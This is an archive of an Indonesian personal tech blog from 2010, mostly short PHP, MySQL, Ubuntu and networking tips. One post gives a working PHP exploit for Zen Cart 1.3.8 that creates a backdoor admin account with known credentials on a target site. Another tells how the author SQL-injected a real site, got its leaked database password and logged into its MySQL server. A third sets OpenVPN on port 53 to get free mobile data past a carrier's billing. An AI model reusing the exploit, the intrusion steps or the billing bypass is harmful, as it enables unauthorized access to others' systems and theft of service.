16 December 2010

Kill Windows Update Restart Popup

Menyebalkan!
Lagi asik download eh windows update udah selesai installnya dan keluar popup harus restart, tanggung neeh download baru 40%, entar aja restartnya... tapi kok, pop upnya menganggu sekali yah, muncul terus.

Langsung ke command promport dan ketik

sc stop wuauserv


he he he he selesai udah gak muncul lagi pop upnya, tinggal tidur ah besok bagun download udah selesai :)
Good night
Read more...

03 December 2010

cek seberapa mahal situs mu

Barusan nyoba beberapa url untuk cek nilai situs atau blog kita, hmmm gak tau dah gimana system penilaian mereka hehehe

http://www.urlrate.com

http://bizinformation.org

Read more...

beberapa fungsi php yang mengunakan regular expression

Mencoba berbagi beberapa fungsi PHP yang memerlukan regular expression.

ereg
pengcocokan berdasarkan regular expression

eregi
pengcocokan berdasarkan regular expression bersifat case insensitive

ereg_replace
replace berdasarkan regular expression


eregi_replace
replace berdasarkan regular expression bersifat insensitive

split
memisahkan string di dalam array berdasarkan regular expression

spliti
memisahkan string di dalam array berdasarkan regular expression bersifat insensitive

preg_match
pengcocokan berdasarkan regular expression

preg_match_all
pengcocokan semua string berdasarkan regular expression

preg_replace
replace berdasarkan regular expression
Read more...

backup and restore mysql

Backup all databases


mysqldump -u [mysql_user] -p [mysql_user_password] --all-databases > /home/user/backups/databases.sql


Backup mysql single database
mysqldump -u [mysql_user] -p [mysql_user_password] database > /home/user/backups/databases.sql


Backup mysql two databases
mysqldump -u [mysql_user] -p [mysql_user_password] --databases databases1 databases2 > /home/user/backups/databases.sql


Backup mysql a specific table

mysqldump -u [mysql_user] -p [mysql_user_password] database table_name > /home/user/backups/table_name.sql


Restoring mysql

mysql -u [mysql_user] -p [mysql_user_password] database < /home/user/backups/databases.sql


Read more...

27 November 2010

Smart search Mysql with full text search

LIKE atau REGEXP dapat melakukan pencarian data sederhana di MYSQL.

SELECT * FROM TABLENAME WHERE COLUMNAME LIKE '%keyword%';

SELECT * FROM TABLENAME WHERE COLUMNAME REGEXP 'keyword';


Salah satu cara melakukan pencarian cerdas (smart search) di MYSQL adalah dengan full text search.

ALTER TABLE TABLENAME ADD FULLTEXT(COLUMNAME);

SELECT * FROM TABLENAME WHERE MATCH(COLUMNAME) AGAINST ('keyword');


Semoga bermanfaat!
Read more...

16 November 2010

Beberapa fungsi string pada PHP

Beberapa fungsi PHP yang digunkan untuk mengolah data string

explode()
fungsi ini digunakan untuk memisahkan string

str_split()
fungsi ini digunakan merubah string ke dalam array

str_replace()

fungsi ini digunakan untuk menganti suatu string


Strtolower()
fungsi ini digunakan untuk merubah string menjadi huruf kecil

Strtoupper()
fungsi ini digunakan untuk merubah string menjadi huruf besar

Strpos()
fungsi ini digunkan untuk mengetahui posisi string

Strlen()
fungsi ini digunakan untuk mengetahui jumlah panjang string

Strrev()
fungsi ini digunakan untuk membalik string dari belakang ke depan

Substr()
fungsi ini digunakan untuk mengambil suatu string

Strstr()
fungsi ini digunakan untuk mencari string

Stristr()
fungsi ini digunakan untuk mencari string

Strchr()

fungsi ini digunakan untuk mencari string

htmlentities()
fungsi ini digunakan untuk membiarkan html tag dibaca apa adanya

trim()

fungsi ini digunakan untuk menghapus spasi

ltrim()
fungsi ini digunakan untuk menghapus space/spasi di bagian depan string

semoga berguna :)
Read more...

11 November 2010

douberry video search download



Bagi penguna blackberry dan smart phone kini semakin mudah download video dari youtube atau metacafe, dengan lahirnya situs duoberry.com

site : http://m.duoberry.com

Download OTA: http://apps.duoberry.com/duoberry.jad

Selain pencarian video duoberry.com juga dapat mencari file mp3 dan ringstone.

untuk kritik dan saran tentang http://m.duoberry.com dapat mengirimkan email ke

contact us duoberry
admin@duoberry.com
cs@duoberry.com
Read more...

21 October 2010

beberapa tool command line linux yang wajib berada di windows

Selama ini mungkin terlalu sering dan di mudahkanya saya mengunakan beberapa tool command line yang ada di linux/nix. Sebagai contoh wget, nc, nmap dan masih banyak lagi. Kemudian jika saya mengunakan windows apakah tool tool itu dapat saya jalankan?

Inilah beberapa tools terminal linux/nix yang bisa di install di windows.

1. wget
wget for windows dapat di temukan di sini


2. netcat
netcat berjalan baik di windows tinggal copy file nc.exe ke windows/system32. netcat for windows dapat di temukan di sini

3. perl
perl for windows biasa di sebut activeperl. activeperl for windows dapat di temukan di sini

4. python
python for windows bisa di temukan di sini

5. php-cli
untuk php cli saya mengunakan appserv yaitu apache+mysql+php5 yang juga sudah terdapat php-cli juga. untuk appserv dapat ditemukan di sini

Itulah beberapa tool command line linux yg ada di dalam windows saya. Namun ada baiknya kita menginstal tool bernama Cygwin.

Apa itu Cygwin, disini saya coba copas dari site Cygwin.

Cygwin is a Linux-like environment for Windows. It consists of two parts:
- A DLL (cygwin1.dll) which acts as a Linux API emulation layer providing substantial Linux API functionality.
- A collection of tools which provide Linux look and feel.

The Cygwin DLL currently works with all recent, commercially released x86 32 bit and 64 bit versions of Windows, with the exception of Windows CE.

informasi cygwin dapat dilihat di http://www.cygwin.com

Read more...

20 October 2010

firefox addons for security analysis and hacking

This Top 10 firefox add-ons for security analysis and hacking.

1. Tamper Data

2. User Agent Switcher

3. HackBar

4. Add N Edit Cookies

5. Firebug

Read more...

19 October 2010

antivirus for linux

The best 5 antivirus for linux

1. ClamAV

2. AVG Anti-Virus Free Edition for Linux

3. avast! Linux Home Edition

4. F-PROT Antivirus for Linux

5. Kaspersky Anti-Virus for Linux


Read more...

18 October 2010

tool for edit your web on ubuntu

The best 5 tool web editor under ubuntu.

1. Bluefish

~$ sudo apt-get install bluefish


2. Kompozer
~$ sudo apt-get install kompozer


3. Quanta
~$ sudo apt-get install quanta


4. gPHPEdit
~$ sudo apt-get install gphpedit


5. Screem
~$ sudo apt-get install screem


Read more...

install google chrome under ubuntu

installing google chrome browser for ubuntu.

~$ sudo wget -q -O - https://dl-ssl.google.com/linux/linux_signing_key.pub | apt-key add -
~$ sudo apt-get update
~$ sudo apt-cache search google | grep chrome


google-chrome-beta - The web browser from Google
google-chrome-stable - The web browser from Google
google-chrome-unstable - The web browser from Google


~$ sudo apt-get install google-chrome-stable

another distro see http://www.google.com/chrome


Read more...

keyboard short cut blackberry

From Home menu
Restart blackberry
ALT+Shift(right)+Del

Help screen
ALT-Shift(right)-H

Show log file
ALT-L-G-L-G


Turns signal strength
ALT-N-M-L-L

Display cause of PDP reject
ALT+JKVV

Displays the Help Me screen
ALT + EACE

Displays the Help Me screen
ALT + ESCR

From Theme Menu
Change to no theme
ALT-THMN

Change to default theme
ALT-THMD

Browser Shortcut
View web page source code
ALT+RBVS

Form Status (Options->Status)
Data & Voice Usage
BUYR
Device test (Keyboard, GPS, RF, Audio (Handset,headset,bluetooth, Misc)
TEST

Read more...

ebook symfony php framework

What's symfony?

Symfony is a web application framework for PHP projects.

It aims to speed up the creation and maintenance of web applications, and to replace the repetitive coding tasks by power, control and pleasure.

The very small number of prerequisites make symfony easy to install on any configuration; you just need Unix or Windows with a web server and PHP installed. It is compatible with almost every database system. In addition, it has a very small overhead, so the benefits of the framework don't come at the cost of an increase of hosting costs.

http://www.symfony-project.org



You can download some ebook symfony on here:








Read more...

17 October 2010

Php fopen, file_get_contents, php curl

Dari ketiga fungsi php yaitu

Php fopen
file_get_contents
php curl

Manakah yang paling cepat dalam mengambil content website?

Ternyata berdasarkan hasil review yang ada di sini inilah yang paling cepat dalam mendownload content sebuah website

UPDATE June 19th, 2010
TEST 1 Results
curl: 7564 fopen: 10599 file_get_contents: 9638

TEST 2 Results
curl: 7910 fopen: 9747 file_get_contents: 9663

TEST 3 Results
curl: 7804 fopen: 10518 file_get_contents: 12384

TEST 4 Results
curl: 6850 fopen: 9596 file_get_contents: 9557

Read more...

16 October 2010

Linux command line for see hardware spek

Processor

~$ cat /proc/cpuinfo

RAM

~$ cat /proc/meminfo

VGA type

~$ lspci | grep VGA
~$ lspci -v -s 00:02.0


HD size

~$ df -h

Motherboard information

~$ sudo dmidecode

Linux distro information

~$ cat /etc/issue
~$ lsb_release -a
~$ lsb_release -ds

Usb device information

~$ lsusb

New hardware


~$ dmesg

Kernel information


~$ uname -a

networking card and IP address

~$ ifconfig -a
~$ /sbin/ifconfig | grep inet
Read more...

15 October 2010

software penganti deepfreeze

Berikut ini beberapa alternatif program pengganti Deep Freeze :

1. Windows Steady State

2. Returnil

3. Sand Boxie

4. Time Freeze

5. Drive Vaccine

6. Restore It

7. Shadow User

8. Clean Slate

9. Shadow Defender

10. Roll Back RX

info dari: jasakom
Read more...

12 October 2010

apache module userdir ubuntu 10

install Apache module userdir

$ sudo apt-get install libapache2-mod-ldap-userdir
$ sudo a2enmod userdir
$ mkdir public_html
$ chmod 775 public_html
$ sudo service apache2 force-reload

then try for access http://localhost/~user/

if work then set php5 userdir for apache


$ sudo apt-get install php5 libapache2-mod-php5
$ sudo a2enmod php5
$ vim /etc/apache2/mods-available/php5.conf

you will be found text

# To re-enable php in user directories comment the following lines
# (from to .) Do NOT set it to On as it
# prevents .htaccess files from disabling it.

just do it and save.then restart apache

$ sudo service apache2 force-reload

Read more...

windows font on ubuntu

Use windows font on ubuntu
its easy to install

$ sudo apt-get install ttf-mscorefonts-installer


Go to home user directory and type

$ mkdir .font

copy all windows font on folder .font

Good luck
Read more...

install gyach ubuntu 10

Install gyach yahoo chat on ubuntu 10 lucid.
I'm use repository linux mint pakage.

Distributor ID: Ubuntu
Description: Ubuntu 10.04 LTS
Release: 10.04
Codename: lucid



$ wget http://packages.linuxmint.com/pool/import/g/gyachi/gyachi_1.2.9-0mint2_i386.deb
$ sudo dpkg -i -f gyachi_1.2.9-0mint2_i386.deb

done gyach ready for use on ubuntu lucid :P


Read more...

08 October 2010

Install curl di appserv

apprserv adalah apache, mysql, php dan phpmyadmin yang di bundle dalam sebuah paket dan berjalan under windows, info tentang appserv silahkan kunjungi appserv

Pada instalasi default php-curl tidak di aktifkan,


untuk mengaktifkannya cukup copy file ssleay32.dll dan libeay32.dll yang ada di folder appserv/php5 ke folder windows/system32.

kemudian edit file php.ini di folder windows buang ; di depan extension=php_curl.dll. langkah terahkir restart apache.

cek apakah curl sudah berjalan http://localhost/phpinfo.php

Read more...

29 June 2010

Zen Cart SQL Execution Exploit php

Lama nggak update blog...
ahkir ahkir ini banyak anak anak yang cari cari target zencart.
iseng aku coba rubah zen.py yang berbasis phyton di milw0rm ke php.

jalan kan scripts php dibawah ini kalau hasilnya done
coba login adminya dengan

username : adminsys
password : wew


ini scriptsnya:
http://noscan.xp3.biz/zen.txt

#!/usr/bin/php

if($argc < 2)
{
echo "
==============================================
Zen Cart 1.3.8 Remote SQL Execution Exploit
==============================================


root@irvian ~# php zen.php http://target.com
==============================================
";exit(1);
}

function gets($url,$post=null) {
$hajar = curl_init();
curl_setopt($hajar,CURLOPT_URL, $url);
curl_setopt($hajar, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($hajar, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($hajar, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);

curl_setopt ($hajar, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($hajar, CURLOPT_TIMEOUT, 0);

if($post != null)
{
curl_setopt ($hajar, CURLOPT_POST, true);
curl_setopt ($hajar, CURLOPT_POSTFIELDS,$post);
}

$result = curl_exec($hajar);
curl_close($hajar);
return $result;
}

$url = $argv[1];

$sql = "INSERT INTO admin (admin_id, admin_name, admin_email, admin_pass) VALUES (56, 'adminsys', 'admin@irvian.info', '617ec22fbb8f201c366e9848c0eb6925:87');
";
$enc = urlencode($sql);
$form = $url."/admin/sqlpatch.php/password_forgotten.php?action=execute";

$req = gets($form,"query_string=$enc");

if(preg_match("/1 statements processed/i", $req)){
echo "\n[!]Done";
}
else{
echo "\n[!]failed";}



Read more...

23 February 2010

about findtoyou.com

If you need a file such as mp3, pdf, jpg and etc you can use findtoyou.com for search.
Why must be findtoyou.com? because this site code by friend from sekuritionline :D.
Maybe you say this promotion or etc, But for me this site it's very great.



just visit and try
http://findtoyou.com

Keep going brotha :)






Read more...

Distro IPCop

Banyak teman yang bertanya kepada saya distro apa yang mudah dan murah untuk router,
kali ini saya coba sarankan untuk mengunakan distro dasyat dan kususnya Opensource IPCop.


IPCop merupakan sebuah distro yang di kususkan untuk firewall dan gateway.
IPCop juga memiliki fitur proxy bernama AdvProxy yang tidak kalah hebat dibanding squid.
Selain itu IPCop juga memiliki pengaturan yang mudah berbasis web.
Limiter bandwith dapat dengan mudah di atur melalui browser.

Selengkapanya tentang distro ini dapat di lihat di

http://www.ipcop.org
http://sourceforge.net/projects/ipcop/
http://sourceforge.net/apps/trac/ipcop/




Read more...

lightsquid monitoring squid proxy

Lightsquid adalah aplikasi third party yang digunakan untuk monitoring log proxy pada squid (/etc/log/squid/access.log).

Lightsquid merupakan kumpulan skrip perl yang memudahkan anda membaca report berbasis web.


Karena berbasis web maka perl apache dan modperl wajid anda install sebelum melakukan instalasi.


selengkapnya tentang aplikasi ini dapat anda baca dan download pada

http://lightsquid.sourceforge.net


Read more...

Setting Router Load Balancing Ubuntu

Dengan semakin kompleks-nya jaringan, terkadang kita memiliki beberapa sambungan ke Internet sekaligus. Saya sendiri di rumah memiliki dua (2) sambungan ke Internet sekaligus, yaitu, ADSL Speedy dan RT/RW-net. Agar kedua sambungan ke Internet tersebut dapat dimanfaatkan secara maksimal, kita perlu melakukan load balancing dengan 2 sambungan tersebut agar secara paralel akses Internet dapat dilakukan.


Spesifikasi / topologi jaringan yang saya gunakan di rumah adalah sebagai berikut

Sambungan ADSL melalui eth2 IP address 192.168.1.222 dengan gateway router ADSL pada IP 192.168.1.1.

Sambungan RT/RW-net melalui eth0 IP address 10.0.148.48 melalui WiFi / Wireless dengan gateway 10.0.148.254.

Sambungan LAN melalui eth1 IP address 192.168.0.222.

Langkah instalasi router adalah sebagai berikut.

Masukan CD / DVD Ubuntu installer, pilih “install a command line system”

Set password root supaya kita dapat menjalankan perintah “su” melalui perintah

$ sudo passwd root

Pindah mode menjadi Super User

# su -

Edit informasi interface pada file /etc/network/interfaces, dapat dilakukan menggunakan vi

# vi /etc/network/interfaces

Informasi penting yang perlu di-edit pada file interfaces adalah

auto eth0
iface eth0 inet static
address 10.0.148.48
netmask 255.255.255.0

auto eth1
iface eth1 inet static
address 192.168.0.222
netmask 255.255.255.0

auto eth2
iface eth2 inet static
address 192.168.1.222
netmask 255.255.255.0

Install beberapa aplikasi pendukung agar memudahkan hidup anda seperti

# apt-get install openssh-server
# /etc/init.d/ssh restart

Selanjutnya kita perlu menset routing dan load balancing yang secara sederhana adalah sebagai berikut

/sbin/ip link set lo up
/sbin/ip link set eth0 up
/sbin/ip link set eth1 up
/sbin/ip link set eth2 up

/sbin/ip route flush table adsl
/sbin/ip route flush table rtrwnet
/sbin/ip route flush table internet

/sbin/ip addr add 127.0.0.1/8 brd 127.0.0.255 dev lo

/sbin/ip addr add 192.168.1.222/24 brd 192.168.1.255 dev eth2
# /sbin/ip addr add 10.0.148.48/24 brd 10.0.148.255 dev eth0
/sbin/ip addr add 192.168.0.222/24 brd 192.168.0.255 dev eth1

/sbin/ip rule add prio 10 table main
/sbin/ip rule add prio 20 table adsl
/sbin/ip rule add prio 30 table rtrwnet
/sbin/ip rule add prio 40 table internet

/sbin/ip route del default table main
/sbin/ip route del default table adsl
/sbin/ip route del default table rtrwnet
/sbin/ip route del default table internet

/sbin/ip rule add prio 20 from 192.168.1.0/24 table adsl
/sbin/ip route add default via 192.168.1.1 dev eth2 src 192.168.1.222 proto static table adsl
/sbin/ip route append prohibit default table adsl metric 1 proto static

/sbin/ip rule add prio 30 from 10.0.148.0/24 table rtrwnet
/sbin/ip route add default via 10.0.148.254 dev eth0 src 10.0.148.48 proto static table rtrwnet
/sbin/ip route append prohibit default table rtrwnet metric 5 proto static

# Set up load balancing gateways
/sbin/ip rule add prio 40 table internet
/sbin/ip route add default proto static table internet \
nexthop via 192.168.1.1 dev eth2 weight 1 \
nexthop via 10.0.148.254 dev eth0 weight 1

Konfigurasi di atas membutuhkan tiga (3) tabel routing tambahan, yaitu, adsl, rtrwnet dan internet yang kita masukan dalam file /etc/iproute2/rt_tables, isinya kira-kira sbb,

120 adsl
121 rtrwnet
123 internet

Selanjutnya kita perlu menset NAT / proxy agar dapat sekaligus melakukan NAT ke dua (2) interface yang berbeda, yaitu, 192.168.1.222 dan 10.0.148.48. Adapun perintahnya adalah sebagai berikut,

/bin/echo 1 > /proc/sys/net/ipv4/ip_forward

/sbin/iptables -F
/sbin/iptables -P INPUT DROP

/sbin/iptables -A INPUT -i eth1 -j ACCEPT
/sbin/iptables -A INPUT -i eth0 -p tcp -s 0/0 –dport 25 -j ACCEPT
/sbin/iptables -A INPUT -i eth2 -p tcp -s 0/0 –dport 25 -j ACCEPT
/sbin/iptables -A INPUT -m state –state ESTABLISHED,RELATED -j ACCEPT
/sbin/iptables -A INPUT -p tcp -i eth0 -j REJECT –reject-with tcp-reset
/sbin/iptables -A INPUT -p tcp -i eth2 -j REJECT –reject-with tcp-reset
/sbin/iptables -A INPUT -p udp -i eth0 -j REJECT –reject-with icmp-port-unreachable
/sbin/iptables -A INPUT -p udp -i eth2 -j REJECT –reject-with icmp-port-unreachable

/sbin/iptables -t nat -A POSTROUTING -o eth2 -j SNAT –to 192.168.1.222
/sbin/iptables -t nat -A POSTROUTING -o eth0 -j SNAT –to 10.0.148.48

penulis : Onno W. Purbo



Read more...

22 February 2010

Install openvpn server

Install openvpn server di dedicated server,
tujuannya adalah untuk bypass connection supaya bisa gprs gratis mengunakan salah satu operator seluler di indonesia.

Kali ini mengunakan CentOS 64bit sebagai OS.


$ wget http://openvpn.net/release/openvpn-2.0.9.tar.gz
$ wget http://openvpn.net/release/lzo-1.08-4.rf.src.rpm
$ yum install rpm-build autoconf.noarch zlib-devel pam-devel openssl-devel
$ rpmbuild –rebuild lzo-1.08-4.rf.src.rpm
$ rpm -Uvh /usr/src/redhat/RPMS/x86_64/lzo-*.rpm
$ rpmbuild -tb openvpn-2.0.9.tar.gz
$ rpm -Uvh /usr/src/redhat/RPMS/x86_64/openvpn-2.0.9-1.i386.rpm
$ cp -r /usr/share/doc/openvpn-2.0.9/easy-rsa/ /etc/openvpn/
$ cp /usr/share/doc/openvpn-2.0.9/sample-config-files/server.conf /etc/openvpn/

Build certificate

$ cd /etc/openvpn/easy-rsa/2.0
$ source ./vars
$ ./vars
$ ./clean-all
$ ./build-ca
$ ./build-key-server server
$ ./build-dh

Build certificate untuk client sysadmin dan admins

$ ./build-key sysadmin
$ ./build-key admins
$ cp /etc/openvpn/easy-rsa/2.0/keys /etc/openvpn/keys -R

sekarang edit server.conf
$ vi /etc/openvpn/server.conf

perhatikan tanda (;) didepan, hapus tanda tersebut dan edit

local 71.201.xx.xx
port 1094
proto udp
dev tun
ca keys/ca.crt
cert keys/server.crt
key keys/server.key
dh keys/dh1024.pem
server 10.8.0.0 255.255.255.0
ifconfig-pool-persist ipp.txt
push "route 10.8.0.0 255.255.255.0"
push "redirect-gateway"
push "dhcp-option DNS 78.256.xx.xx"
keepalive 10 120
comp-lzo
persist-key
persist-tun
status openvpn-status.log
verb 3


Ganti local IP (local 71.201.xx.xx) dan DNS (push "dhcp-option DNS 78.256.xx.xx") dengan IP server dan DNS server anda.
Sedang port 1094 saya ganti 53 tujuanya adalah unuk untuk bypass (supaya bisa GPRS gratis).
Karena openvpn di jalakan pada port 53, maka service bind harus dimatikan supaya tidak konflik.

Jalankan openvpn service

$ service openvpn start

Enabling packet forwarding

$ echo 1 > /proc/sys/net/ipv4/ip_forward

NAT table MASQUERADING

$ iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -o eth0 -j MASQUERADE

Konfigurasi di server selesai, sekarang saatnya konfigurasi di client windows.

Download dan install OpenVPN GUI
http://openvpn.se/files/install_packages/openvpn-2.0.9-gui-1.0.3-install.exe

Copy ca.crt, sysadmin.crt, admins.crt, sysadmin.key, admins.key pada folder /etc/openvpn/keys di dedicated server.
kemudian simpan di folder
c:\program files\openvpn\config\sysadmin
dan
c:\program files\openvpn\config\admins
pada client windows

Kemudian buat file sysadmin.ovpn dan isi dengan konfigurasi dibawah ini

client
dev tun
proto udp
remote 71.201.xx.xx 1094
resolv-retry infinite
nobind
persist-key
persist-tun
ca ca.crt
cert sysadmin.crt
key sysadmin.key
comp-lzo
verb 3


Simpan file tersebut pada folder c:\program files\openvpn\config\sysadmin\
Kemudia buat file lagi admins.ovpn dan isi dengan konfigurasi dibawah ini

client
dev tun
proto udp
remote 71.201.xx.xx 1094
resolv-retry infinite
nobind
persist-key
persist-tun
ca ca.crt
cert admins.crt
key admins.key
comp-lzo
verb 3


Simpan file tersebut pada folder c:\program files\openvpn\config\admins\

Connectkan openvpn client.

Read more...

23 January 2010

asal update

Pusing bercampur marah kesel dan juga emosi baru saja melanda ku !!!!!...????
Iseng iseng hidupin PC...

browsing ...


tiba tiba nemu site

https://www.saxxxxxxxx.com

Sorry di sensor gw nggak mau kena undang udang ITE atau apalah yang bikin urusan tambah runyam!!!

Secara keseluruhan nggak ada yang berarti dari site ini sampai tiba tiba aku baca tulisan store
iseng iseng coba sql injection aahhh kwkwkwkwkkw kebiasaan :P

https://www.saxxxxxxxx.com/store/category.php?id=3%27

lhooooh kok sourcenya keliatan semuaaaaa!!!


[connection] => Resource id #22
[dsn] => Array
(
[phptype] => mysql
[dbsyntax] => mysql
[username] => saxxxxx_user
[password] => pluxxxxx
[protocol] => tcp
[hostspec] => localhost
[port] =>
[socket] =>
[database] => saxxxxx_db
)



tau deh kenapa sebabnya malas mikir !!! langsung aja test port mysql

$ nc -vv saxxxxxxxx.com 3306
Connection to saxxxxxxxx.com 3306 port [tcp/mysql] succeeded!

ho ho ho open!!!

langsung connect

$mysql -u saxxxxx_user -h saxxxxxxxx.com
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 1237218
Server version: 4.1.22-standard

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql>

dah ah sampai sini dulu mau tidur dulu soalnya kepala tambah semakin pusing!!!!!!!!!!!!


Read more...

powered by irvian